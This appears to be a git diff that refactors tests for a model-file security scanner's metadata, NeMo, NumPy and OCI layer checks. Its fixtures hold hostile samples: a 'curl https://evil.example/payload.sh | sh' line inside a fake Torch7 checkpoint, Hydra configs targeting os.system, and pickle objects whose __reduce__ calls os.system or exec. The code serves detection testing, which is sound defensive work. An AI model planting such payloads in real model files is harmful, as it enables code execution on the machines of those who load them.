b/tests/scanners/test_metadata_scanner.py index 58eb5ec9a..ce09f8ac6 100644 --- a/tests/scanners/test_metadata_scanner.py +++ b/tests/scanners/test_metadata_scanner.py @@ -16,20 +16,14 @@ from modelaudit.scanners.base import CheckStatus, IssueSeverity from modelaudit.scanners.metadata_scanner import MetadataScanner from modelaudit.utils.helpers import cache_decorator +from tests.helpers.text import LowerCountingText class TestMetadataScanner: """Test metadata scanner functionality.""" def test_known_secret_format_reuses_lowered_description(self) -> None: - class CountingDescription(str): - lower_calls = 0 - - def lower(self) -> str: - self.lower_calls += 1 - return super().lower() - - description = CountingDescription("OpenAI API Key") + description = LowerCountingText("OpenAI API Key") assert MetadataScanner._is_known_secret_format(description) is True assert description.lower_calls == 1 @@ -252,20 +246,11 @@ def test_scan_detects_suspicious_subdomain_hosts(self) -> None: def test_scan_ignores_suspicious_domain_substrings(self) -> None: """Test URLs are matched by hostname, not generic substring.""" - scanner = MetadataScanner() - - with tempfile.TemporaryDirectory() as temp_dir: - readme_path = Path(temp_dir) / "README.md" - with open(readme_path, "w") as f: - f.write( - "# Model Info\n\n" - "- Docs: https://example.com/guide?redirect=bit.ly/suspicious-model\n" - "- API: https://safe-ngrok.io/docs\n" - ) - - result = scanner.scan(str(readme_path)) - - assert len(result.issues) == 0 + _assert_metadata_near_match_clean( + "# Model Info\n\n" + "- Docs: https://example.com/guide?redirect=bit.ly/suspicious-model\n" + "- API: https://safe-ngrok.io/docs\n" + ) def test_scan_detects_suspicious_domains_hidden_in_userinfo(self, tmp_path: Path) -> None: """Shorteners and tunnel domains in userinfo should still be flagged.""" @@ -409,17 +394,10 @@ def test_scan_exposed_secrets_redacts_match_preview_in_outputs(self, tmp_path: P def test_scan_ignores_placeholder_secrets(self) -> None: """Test that obvious placeholders are not flagged as secrets.""" - scanner = MetadataScanner() - - with tempfile.TemporaryDirectory() as temp_dir: - readme_path = Path(temp_dir) / "README.md" - with open(readme_path, "w") as f: - f.write("# Setup\n\nAPI Key: your_api_key_here\nToken: placeholder_token\nSecret: XXXXXXXXXX\n") - - result = scanner.scan(str(readme_path)) - # Should not flag placeholders - assert len(result.issues) == 0 + _assert_metadata_near_match_clean( + "# Setup\n\nAPI Key: your_api_key_here\nToken: placeholder_token\nSecret: XXXXXXXXXX\n" + ) def test_scan_nonexistent_file(self): """Test handling of nonexistent files.""" @@ -552,3 +530,16 @@ def raise_mid_helper(*_args: object, **_kwargs: object) -> bool: assert len(timeout_checks) == 1 assert detected_domains == {"bit.ly"} assert not any(check.name == "Metadata Scan Error" for check in result.checks) + + +def _assert_metadata_near_match_clean(contents: str) -> None: + scanner = MetadataScanner() + + with tempfile.TemporaryDirectory() as temp_dir: + readme_path = Path(temp_dir) / "README.md" + with open(readme_path, "w") as f: + f.write(contents) + + result = scanner.scan(str(readme_path)) + + assert len(result.issues) == 0 diff --git a/tests/scanners/test_nemo_scanner.py b/tests/scanners/test_nemo_scanner.py index 735fe4566..4c704351c 100644 --- a/tests/scanners/test_nemo_scanner.py +++ b/tests/scanners/test_nemo_scanner.py @@ -15,6 +15,8 @@ import pytest +from tests.helpers.file_creators import SystemCommandPayload + try: import yaml @@ -220,11 +222,7 @@ def _materialize_tmp_paths(value: Any, tmp_path: Path) -> Any: def _build_malicious_pickle() -> bytes: import os as os_module - class DangerousPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os_module.system, ("echo nemo-checkpoint-test",)) - - return pickle.dumps(DangerousPayload()) + return pickle.dumps(SystemCommandPayload("echo nemo-checkpoint-test", lambda: os_module.system)) class TestNemoScannerBasic: @@ -1425,40 +1423,24 @@ def test_gzip_framed_malicious_checkpoint_still_detected(self, tmp_path: Path) - assert cve_checks[0].severity == IssueSeverity.CRITICAL def test_torch7_checkpoint_with_pt_suffix_detects_nemo_deserialization_cve(self, tmp_path: Path) -> None: - nemo_path = tmp_path / "torch7-checkpoint-rce.nemo" - torch7_payload = ( - b"4\n1\n3\nV 1\n13\nnn.Sequential\n" - b"4\n2\n3\nV 1\n17\ntorch.FloatTensor\n" - b"cmd = os.execute('curl https://evil.example/payload.sh | sh')\n" + _assert_nemo_torch7_checkpoint_cve( + tmp_path, + ("torch7-checkpoint-rce.nemo"), + ( + b"4\n1\n3\nV 1\n13\nnn.Sequential\n" + b"4\n2\n3\nV 1\n17\ntorch.FloatTensor\n" + b"cmd = os.execute('curl https://evil.example/payload.sh | sh')\n" + ), ) - with tarfile.open(nemo_path, "w") as tar: - _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n") - _add_tar_bytes(tar, "model_weights.pt", torch7_payload) - - result = NemoScanner().scan(str(nemo_path)) - - cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23249"] - assert len(cve_checks) == 1 - assert cve_checks[0].severity == IssueSeverity.CRITICAL - assert cve_checks[0].details["nested_scanner"] == "torch7" def test_marker_form_torch7_checkpoint_with_pt_suffix_detects_nemo_deserialization_cve( self, tmp_path: Path ) -> None: - nemo_path = tmp_path / "marker-torch7-checkpoint-rce.nemo" - torch7_payload = ( - b"\x01\x00torch.FloatTensor nn.Sequential os.execute('curl https://evil.example/payload.sh | sh')\n" + _assert_nemo_torch7_checkpoint_cve( + tmp_path, + ("marker-torch7-checkpoint-rce.nemo"), + (b"\x01\x00torch.FloatTensor nn.Sequential os.execute('curl https://evil.example/payload.sh | sh')\n"), ) - with tarfile.open(nemo_path, "w") as tar: - _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n") - _add_tar_bytes(tar, "model_weights.pt", torch7_payload) - - result = NemoScanner().scan(str(nemo_path)) - - cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23249"] - assert len(cve_checks) == 1 - assert cve_checks[0].severity == IssueSeverity.CRITICAL - assert cve_checks[0].details["nested_scanner"] == "torch7" def test_duplicate_checkpoint_replacement_detects_nemo_deserialization_cve(self, tmp_path: Path) -> None: nemo_path = tmp_path / "duplicate-checkpoint-rce.nemo" @@ -3065,38 +3047,10 @@ def test_core_routes_renamed_nemo_archive_and_detects_dangerous_target(self, tmp assert any(issue.severity == IssueSeverity.CRITICAL for issue in directory.issues) def test_core_routes_gzip_wrapped_renamed_nemo_archive(self, tmp_path: Path) -> None: - path = tmp_path / "compressed.jpg" - with tarfile.open(path, "w:gz") as archive: - _add_tar_bytes(archive, "model_config.yaml", b"model:\n _target_: os.system\n command: echo pwned\n") - - result = scan_file(str(path), config={"cache_scan_results": False}) - - assert result.scanner_name == "nemo" - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.details["target"] == "os.system" - for check in result.checks - ) + _assert_core_routes_renamed_nemo(tmp_path, ("compressed.jpg"), ("w:gz"), ("model_config.yaml")) def test_core_routes_normalized_root_config_in_renamed_nemo_archive(self, tmp_path: Path) -> None: - path = tmp_path / "normalized-config.jpg" - with tarfile.open(path, "w") as archive: - _add_tar_bytes( - archive, - "configs/../model_config.yaml", - b"model:\n _target_: os.system\n command: echo pwned\n", - ) - - result = scan_file(str(path), config={"cache_scan_results": False}) - - assert result.scanner_name == "nemo" - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.details["target"] == "os.system" - for check in result.checks - ) + _assert_core_routes_renamed_nemo(tmp_path, ("normalized-config.jpg"), ("w"), ("configs/../model_config.yaml")) @pytest.mark.parametrize("link_type", [tarfile.SYMTYPE, tarfile.LNKTYPE]) @pytest.mark.parametrize( @@ -4162,22 +4116,7 @@ def test_renamed_nemo_root_config_within_route_budget_is_scanned( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "_NEMO_ROUTE_MAX_ENTRIES", 3) - path = tmp_path / "late-config.jpg" - with tarfile.open(path, "w") as archive: - _add_tar_bytes(archive, "assets/one.bin", b"one") - _add_tar_bytes(archive, "assets/two.bin", b"two") - _add_tar_bytes(archive, "model_config.yaml", b"model:\n _target_: os.system\n command: echo pwned\n") - - result = scan_file(str(path), config={"cache_scan_results": False}) - - assert result.scanner_name == "nemo" - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.details["target"] == "os.system" - for check in result.checks - ) + _assert_nemo_root_config_scan(tmp_path, monkeypatch, (3), ("late-config.jpg")) @pytest.mark.parametrize( ("target", "expected_success", "expected_exit_code"), @@ -4794,22 +4733,7 @@ def test_declared_nemo_scans_root_config_beyond_renamed_route_budget( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "_NEMO_ROUTE_MAX_ENTRIES", 2) - path = tmp_path / "declared.nemo" - with tarfile.open(path, "w") as archive: - _add_tar_bytes(archive, "assets/one.bin", b"one") - _add_tar_bytes(archive, "assets/two.bin", b"two") - _add_tar_bytes(archive, "model_config.yaml", b"model:\n _target_: os.system\n command: echo pwned\n") - - result = scan_file(str(path), config={"cache_scan_results": False}) - - assert result.scanner_name == "nemo" - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.details["target"] == "os.system" - for check in result.checks - ) + _assert_nemo_root_config_scan(tmp_path, monkeypatch, (2), ("declared.nemo")) def test_nested_renamed_nemo_member_detects_dangerous_target(self, tmp_path: Path) -> None: member_path = _create_nemo_file( @@ -5866,17 +5790,7 @@ def test_network_and_file_access_targets_are_dangerous( ) def test_additional_immediate_io_targets_are_dangerous(self, tmp_path: Path, target: str) -> None: """Immediate I/O aliases in covered sink families must not remain INFO-only.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details.get("target") == target - for check in result.checks - ) + _assert_hydra_target_critical(tmp_path, target) @pytest.mark.parametrize( "target", @@ -5887,32 +5801,12 @@ def test_additional_immediate_io_targets_are_dangerous(self, tmp_path: Path, tar ) def test_non_io_omegaconf_targets_remain_safe(self, tmp_path: Path, target: str) -> None: """Exact OmegaConf I/O overrides must not invalidate the broader safe namespace.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert not any(check.name.startswith("CVE-2025-23304") for check in result.checks) - assert any( - check.name == "Hydra _target_ Safety Check" - and check.status == CheckStatus.PASSED - and check.details.get("target") == target - for check in result.checks - ) + _assert_hydra_target_safe(tmp_path, target) def test_transformers_factory_without_loading_remains_safe(self, tmp_path: Path) -> None: """The from_pretrained override must not invalidate safe Transformers factories.""" target = "transformers.AutoModel" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert not any(check.name.startswith("CVE-2025-23304") for check in result.checks) - assert any( - check.name == "Hydra _target_ Safety Check" - and check.status == CheckStatus.PASSED - and check.details.get("target") == target - for check in result.checks - ) + _assert_hydra_target_safe(tmp_path, target) @pytest.mark.parametrize( "target", @@ -6012,17 +5906,7 @@ def test_transformers_factory_without_loading_remains_safe(self, tmp_path: Path) ) def test_safe_namespace_side_effect_targets_are_dangerous(self, tmp_path: Path, target: str) -> None: """Broad trusted namespaces must not hide import, global-state, network, or file side effects.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details.get("target") == target - for check in result.checks - ) + _assert_hydra_target_critical(tmp_path, target) @pytest.mark.parametrize( "target", @@ -6046,17 +5930,7 @@ def test_safe_namespace_side_effect_targets_are_dangerous(self, tmp_path: Path, ) def test_safe_namespace_side_effect_near_matches_remain_safe(self, tmp_path: Path, target: str) -> None: """Exact helpers and method suffixes must not promote similarly named safe-namespace callables.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert not any(check.name.startswith("CVE-2025-23304") for check in result.checks) - assert any( - check.name == "Hydra _target_ Safety Check" - and check.status == CheckStatus.PASSED - and check.details.get("target") == target - for check in result.checks - ) + _assert_hydra_target_safe(tmp_path, target) @pytest.mark.parametrize( ("target", "target_config", "expected_argument", "expected_reason"), @@ -6599,15 +6473,7 @@ def test_model_loader_absolute_path_fails_aggregate_scan(self, tmp_path: Path) - ) def test_safe_namespace_side_effect_targets_fail_aggregate_scan(self, tmp_path: Path, target: str) -> None: """Representative trusted-namespace side effects must retain security exit-code precedence.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = scan_model_directory_or_file(str(path), config={"cache_scan_results": False}) - - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("target") == target - for issue in result.issues - ) - assert determine_exit_code(result) == 1 + _assert_hydra_aggregate_critical(tmp_path, target) @pytest.mark.parametrize( "target", @@ -6707,20 +6573,7 @@ def test_safe_namespace_side_effect_targets_fail_aggregate_scan(self, tmp_path: ) def test_reviewed_constructor_and_loader_aliases_are_dangerous(self, tmp_path: Path, target: str) -> None: """Immediate network, file, and native-loader aliases must fail security review.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details.get("target") == target - for check in result.checks - ) - assert not any( - check.name == "Hydra _target_ Review" and check.details.get("target") == target for check in result.checks - ) + _assert_hydra_target_critical_without_review(tmp_path, target) @pytest.mark.parametrize( "target", @@ -6742,20 +6595,7 @@ def test_immediate_creator_connection_and_discovery_aliases_are_dangerous( target: str, ) -> None: """Immediate filesystem, network, and process-backed aliases must fail security review.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details.get("target") == target - for check in result.checks - ) - assert not any( - check.name == "Hydra _target_ Review" and check.details.get("target") == target for check in result.checks - ) + _assert_hydra_target_critical_without_review(tmp_path, target) @pytest.mark.parametrize( "target", @@ -6793,18 +6633,7 @@ def test_immediate_creator_connection_and_discovery_aliases_are_dangerous( ) def test_constructor_and_loader_near_matches_remain_review_only(self, tmp_path: Path, target: str) -> None: """Exact alias coverage should not promote similarly named custom factories.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert not any(check.name.startswith("CVE-2025-23304") for check in result.checks) - assert any( - check.name == "Hydra _target_ Review" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.INFO - and check.details.get("target") == target - for check in result.checks - ) + _assert_hydra_target_review_only(tmp_path, target) @pytest.mark.parametrize( ("target", "target_config"), @@ -7130,15 +6959,7 @@ def test_network_and_file_access_targets_fail_aggregate_scan( ) def test_additional_immediate_io_targets_fail_aggregate_scan(self, tmp_path: Path, target: str) -> None: """Representative added I/O aliases should retain security exit-code precedence.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = scan_model_directory_or_file(str(path), config={"cache_scan_results": False}) - - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("target") == target - for issue in result.issues - ) - assert determine_exit_code(result) == 1 + _assert_hydra_aggregate_critical(tmp_path, target) @pytest.mark.parametrize( "target", @@ -7289,20 +7110,7 @@ def test_additional_immediate_io_targets_fail_aggregate_scan(self, tmp_path: Pat ) def test_process_and_global_side_effect_aliases_are_dangerous(self, tmp_path: Path, target: str) -> None: """Exact process and cwd side effects should not fall through to INFO-only review.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert any( - check.name == "CVE-2025-23304: Dangerous Hydra _target_" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details.get("target") == target - for check in result.checks - ) - assert not any( - check.name == "Hydra _target_ Review" and check.details.get("target") == target for check in result.checks - ) + _assert_hydra_target_critical_without_review(tmp_path, target) @pytest.mark.parametrize( "target", @@ -7343,18 +7151,7 @@ def test_process_and_global_side_effect_aliases_are_dangerous(self, tmp_path: Pa ) def test_execution_alias_near_matches_remain_review_only(self, tmp_path: Path, target: str) -> None: """Exact alias coverage should not promote similarly named custom factories.""" - path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) - - result = NemoScanner().scan(str(path)) - - assert not any(check.name.startswith("CVE-2025-23304") for check in result.checks) - assert any( - check.name == "Hydra _target_ Review" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.INFO - and check.details.get("target") == target - for check in result.checks - ) + _assert_hydra_target_review_only(tmp_path, target) def test_unknown_request_named_custom_target_remains_review_only(self, tmp_path: Path) -> None: """Exact sink coverage should not promote benign request-like custom factories.""" @@ -7809,14 +7606,7 @@ def test_suspicious_pattern_detected(self, tmp_path: Path) -> None: def test_suspicious_target_with_numeric_suffix_detected(self, tmp_path: Path) -> None: """Suffix-number variants like eval2 should still be treated as suspicious.""" - config = {"model": {"_target_": "custom_module.eval2"}} - path = _create_nemo_file(tmp_path, config) - - result = NemoScanner().scan(str(path)) - - suspicious_checks = [c for c in result.checks if c.name == "CVE-2025-23304: Suspicious Hydra _target_"] - assert len(suspicious_checks) == 1 - assert suspicious_checks[0].details["pattern"] == "eval" + _assert_nemo_suspicious_target(tmp_path, ("custom_module.eval2"), ("eval")) def test_benign_embedded_keyword_target_is_review_only(self, tmp_path: Path) -> None: """Benign near-match words like 'systematic' should not trigger CVE-2025-23304.""" @@ -7935,16 +7725,7 @@ def test_safe_prefix_not_flagged_for_suspicious_pattern(self, tmp_path): def test_safe_prefix_does_not_suppress_suspicious_leaf_target(self, tmp_path: Path) -> None: """Trusted namespaces must not hide obviously dangerous target components.""" - config = { - "model": {"_target_": "nemo.eval_utils.system"}, - } - path = _create_nemo_file(tmp_path, config) - - result = NemoScanner().scan(str(path)) - - suspicious_checks = [c for c in result.checks if c.name == "CVE-2025-23304: Suspicious Hydra _target_"] - assert len(suspicious_checks) == 1 - assert suspicious_checks[0].details["pattern"] == "system" + _assert_nemo_suspicious_target(tmp_path, ("nemo.eval_utils.system"), ("system")) def test_safe_prefix_ignores_suspicious_intermediate_component(self, tmp_path: Path) -> None: """Namespace segments alone should not make an otherwise safe callable suspicious.""" @@ -8864,3 +8645,139 @@ def test_declared_nemo_nested_checkpoint_within_aggregate_budget_remains_complet for check in result.checks if check.name == "TAR Aggregate Size Limit Check" and check.status == CheckStatus.FAILED ] + + +def _assert_hydra_aggregate_critical(tmp_path: Path, target: str) -> None: + path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) + + result = scan_model_directory_or_file(str(path), config={"cache_scan_results": False}) + + assert any( + issue.severity == IssueSeverity.CRITICAL and issue.details.get("target") == target for issue in result.issues + ) + assert determine_exit_code(result) == 1 + + +def _assert_hydra_target_safe(tmp_path: Path, target: str) -> None: + path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) + + result = NemoScanner().scan(str(path)) + + assert not any(check.name.startswith("CVE-2025-23304") for check in result.checks) + assert any( + check.name == "Hydra _target_ Safety Check" + and check.status == CheckStatus.PASSED + and check.details.get("target") == target + for check in result.checks + ) + + +def _assert_hydra_target_critical(tmp_path: Path, target: str) -> None: + path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) + + result = NemoScanner().scan(str(path)) + + assert any( + check.name == "CVE-2025-23304: Dangerous Hydra _target_" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + and check.details.get("target") == target + for check in result.checks + ) + + +def _assert_hydra_target_review_only(tmp_path: Path, target: str) -> None: + path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) + + result = NemoScanner().scan(str(path)) + + assert not any(check.name.startswith("CVE-2025-23304") for check in result.checks) + assert any( + check.name == "Hydra _target_ Review" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.INFO + and check.details.get("target") == target + for check in result.checks + ) + + +def _assert_hydra_target_critical_without_review(tmp_path: Path, target: str) -> None: + path = _create_nemo_file(tmp_path, {"model": {"_target_": target}}) + + result = NemoScanner().scan(str(path)) + + assert any( + check.name == "CVE-2025-23304: Dangerous Hydra _target_" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + and check.details.get("target") == target + for check in result.checks + ) + assert not any( + check.name == "Hydra _target_ Review" and check.details.get("target") == target for check in result.checks + ) + + +def _assert_nemo_root_config_scan( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, entry_limit: int, filename: str +) -> None: + monkeypatch.setattr(file_detection, "_NEMO_ROUTE_MAX_ENTRIES", entry_limit) + path = tmp_path / filename + with tarfile.open(path, "w") as archive: + _add_tar_bytes(archive, "assets/one.bin", b"one") + _add_tar_bytes(archive, "assets/two.bin", b"two") + _add_tar_bytes(archive, "model_config.yaml", b"model:\n _target_: os.system\n command: echo pwned\n") + + result = scan_file(str(path), config={"cache_scan_results": False}) + + assert result.scanner_name == "nemo" + assert any( + check.name == "CVE-2025-23304: Dangerous Hydra _target_" + and check.status == CheckStatus.FAILED + and check.details["target"] == "os.system" + for check in result.checks + ) + + +def _assert_nemo_torch7_checkpoint_cve(tmp_path: Path, filename: str, payload: bytes) -> None: + nemo_path = tmp_path / filename + torch7_payload = payload + with tarfile.open(nemo_path, "w") as tar: + _add_tar_bytes(tar, "model_config.yaml", b"model: safe\n") + _add_tar_bytes(tar, "model_weights.pt", torch7_payload) + + result = NemoScanner().scan(str(nemo_path)) + + cve_checks = [check for check in result.checks if check.details.get("cve_id") == "CVE-2025-23249"] + assert len(cve_checks) == 1 + assert cve_checks[0].severity == IssueSeverity.CRITICAL + assert cve_checks[0].details["nested_scanner"] == "torch7" + + +def _assert_core_routes_renamed_nemo( + tmp_path: Path, filename: str, archive_mode: Literal["w", "w:gz"], config_member: str +) -> None: + path = tmp_path / filename + with tarfile.open(path, archive_mode) as archive: + _add_tar_bytes(archive, config_member, b"model:\n _target_: os.system\n command: echo pwned\n") + + result = scan_file(str(path), config={"cache_scan_results": False}) + + assert result.scanner_name == "nemo" + assert any( + check.name == "CVE-2025-23304: Dangerous Hydra _target_" + and check.status == CheckStatus.FAILED + and check.details["target"] == "os.system" + for check in result.checks + ) + + +def _assert_nemo_suspicious_target(tmp_path: Path, target: str, pattern: str) -> None: + config = {"model": {"_target_": target}} + path = _create_nemo_file(tmp_path, config) + + result = NemoScanner().scan(str(path)) + + suspicious_checks = [c for c in result.checks if c.name == "CVE-2025-23304: Suspicious Hydra _target_"] + assert len(suspicious_checks) == 1 + assert suspicious_checks[0].details["pattern"] == pattern diff --git a/tests/scanners/test_numpy_scanner.py b/tests/scanners/test_numpy_scanner.py index 17696e6a5..d5e1885be 100644 --- a/tests/scanners/test_numpy_scanner.py +++ b/tests/scanners/test_numpy_scanner.py @@ -24,6 +24,7 @@ _numpy_object_reconstruction_reference_is_trusted, _read_numpy_array_header, ) +from tests.helpers.file_creators import ExecPayload _MALFORMED_NUMPY_RECONSTRUCT_PAYLOAD = b"cnumpy._core.multiarray\n_reconstruct\n(NtR." @@ -282,11 +283,6 @@ def test_structured_with_object_field_triggers_cve(self, tmp_path): assert len(cve_checks) > 0, "Structured dtype with object field should trigger CVE" -class _ExecPayload: - def __reduce__(self) -> tuple[Callable[..., Any], tuple[Any, ...]]: - return (exec, ("print('owned')",)) - - def _write_metadata_marker(path: str) -> None: Path(path).write_text("executed", encoding="utf-8") @@ -619,7 +615,7 @@ def _inject_comment_token_into_npz_member(path: Path, member_name: str) -> None: def test_object_dtype_numpy_recurses_into_pickle_exec(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "malicious_object.npy" np.save(path, arr, allow_pickle=True) @@ -667,7 +663,7 @@ def test_numeric_npz_has_no_pickle_recursion_findings(tmp_path: Path) -> None: def test_object_npz_member_recurses_into_pickle_exec_with_member_context(tmp_path: Path) -> None: safe = np.array([1, 2, 3], dtype=np.int64) - malicious = np.array([_ExecPayload()], dtype=object) + malicious = np.array([ExecPayload()], dtype=object) npz_path = tmp_path / "mixed_object.npz" np.savez(npz_path, safe=safe, payload=malicious) @@ -681,7 +677,7 @@ def test_object_npz_member_recurses_into_pickle_exec_with_member_context(tmp_pat def test_object_dtype_numpy_comment_token_bypass_still_detected(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "comment_token.npy" np.save(path, arr, allow_pickle=True) _inject_comment_token_into_npy_payload(path) @@ -696,7 +692,7 @@ def test_object_dtype_numpy_comment_token_bypass_still_detected(tmp_path: Path) def test_object_npz_member_comment_token_bypass_still_detected(tmp_path: Path) -> None: npz_path = tmp_path / "comment_token.npz" - np.savez(npz_path, payload=np.array([_ExecPayload()], dtype=object)) + np.savez(npz_path, payload=np.array([ExecPayload()], dtype=object)) _inject_comment_token_into_npz_member(npz_path, "payload.npy") from modelaudit.scanners.zip_scanner import ZipScanner @@ -1201,7 +1197,7 @@ def fake_embedded_scan( def test_numpy_object_dtype_malicious_exit1(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "malicious_object.npy" np.save(path, arr, allow_pickle=True) @@ -1217,7 +1213,7 @@ def test_numpy_object_dtype_malicious_exit1(tmp_path: Path) -> None: def test_numpy_object_dtype_pickle_selection_skip_is_inconclusive(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "malicious_object_numpy_only.npy" np.save(path, arr, allow_pickle=True) @@ -1254,7 +1250,7 @@ def test_numpy_object_dtype_pickle_selection_skip_is_inconclusive(tmp_path: Path def test_numpy_object_dtype_pickle_exclusion_is_inconclusive_and_not_cached(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "malicious_object_pickle_excluded.npy" cache_dir = tmp_path / "cache" np.save(path, arr, allow_pickle=True) @@ -1296,7 +1292,7 @@ def test_numpy_object_dtype_pickle_exclusion_is_inconclusive_and_not_cached(tmp_ def test_numpy_structured_object_field_pickle_selection_skip_is_inconclusive(tmp_path: Path) -> None: dtype = np.dtype([("payload", object), ("score", np.int64)]) - arr = np.array([(_ExecPayload(), 7)], dtype=dtype) + arr = np.array([(ExecPayload(), 7)], dtype=dtype) path = tmp_path / "structured_object_numpy_only.npy" np.save(path, arr, allow_pickle=True) @@ -1347,7 +1343,7 @@ def test_numpy_numeric_dtype_numpy_only_remains_conclusive(tmp_path: Path) -> No def test_numpy_object_dtype_pickle_selection_control_detects_exec(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "malicious_object_numpy_and_pickle.npy" np.save(path, arr, allow_pickle=True) @@ -1370,7 +1366,7 @@ def test_numpy_object_dtype_pickle_selection_control_detects_exec(tmp_path: Path def test_numpy_object_npz_pickle_selection_skip_is_inconclusive(tmp_path: Path) -> None: path = tmp_path / "malicious_object_numpy_only.npz" - np.savez(path, payload=np.array([_ExecPayload()], dtype=object)) + np.savez(path, payload=np.array([ExecPayload()], dtype=object)) result = scan_model_directory_or_file( str(path), @@ -1408,7 +1404,7 @@ def test_benign_object_dtype_npz_no_nested_critical(tmp_path: Path) -> None: def test_truncated_npy_fails_safely(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "truncated.npy" np.save(path, arr, allow_pickle=True) path.write_bytes(path.read_bytes()[:-8]) @@ -1470,7 +1466,7 @@ def test_object_dtype_numpy_trailing_bytes_exit2_not_security_finding(tmp_path: def test_object_dtype_numpy_trailing_bytes_malicious_exit1(tmp_path: Path) -> None: - arr = np.array([_ExecPayload()], dtype=object) + arr = np.array([ExecPayload()], dtype=object) path = tmp_path / "malicious_trailing.npy" np.save(path, arr, allow_pickle=True) path.write_bytes(path.read_bytes() + b"TRAILINGJUNK") diff --git a/tests/scanners/test_oci_layer_scanner.py b/tests/scanners/test_oci_layer_scanner.py index 25bf0cfdb..8a34ffb45 100644 --- a/tests/scanners/test_oci_layer_scanner.py +++ b/tests/scanners/test_oci_layer_scanner.py @@ -7,6 +7,8 @@ import shutil import tarfile import tempfile +from collections.abc import Callable +from functools import partial from pathlib import Path from typing import Any from unittest.mock import patch @@ -19,7 +21,17 @@ from modelaudit.scanners import flax_msgpack_scanner from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, IssueSeverity, ScanResult from modelaudit.scanners.oci_layer_scanner import OciLayerScanner -from modelaudit.utils.file.detection import FLAX_MSGPACK_STRUCTURE_READ_BYTES +from tests.helpers.cache import assert_inconclusive_not_cached as _assert_inconclusive_aggregate_not_cached +from tests.helpers.file_creators import SystemCommandPayload +from tests.helpers.file_creators import write_delayed_flax_cntk_overlap as _write_delayed_flax_cntk_overlap + + +def _record_onnx_payloads(payloads: list[bytes], scan_path: str, _config: dict[str, Any]) -> ScanResult: + if scan_path.endswith(".onnx"): + payloads.append(Path(scan_path).read_bytes()) + nested_result = ScanResult(scanner_name="unknown") + nested_result.finish() + return nested_result def _gzip_with_comment(payload: bytes, comment: bytes) -> bytes: @@ -49,52 +61,6 @@ def _pad_tar_payload(payload: bytes) -> bytes: return payload + (b"\0" * ((-len(payload)) % tarfile.BLOCKSIZE)) -def 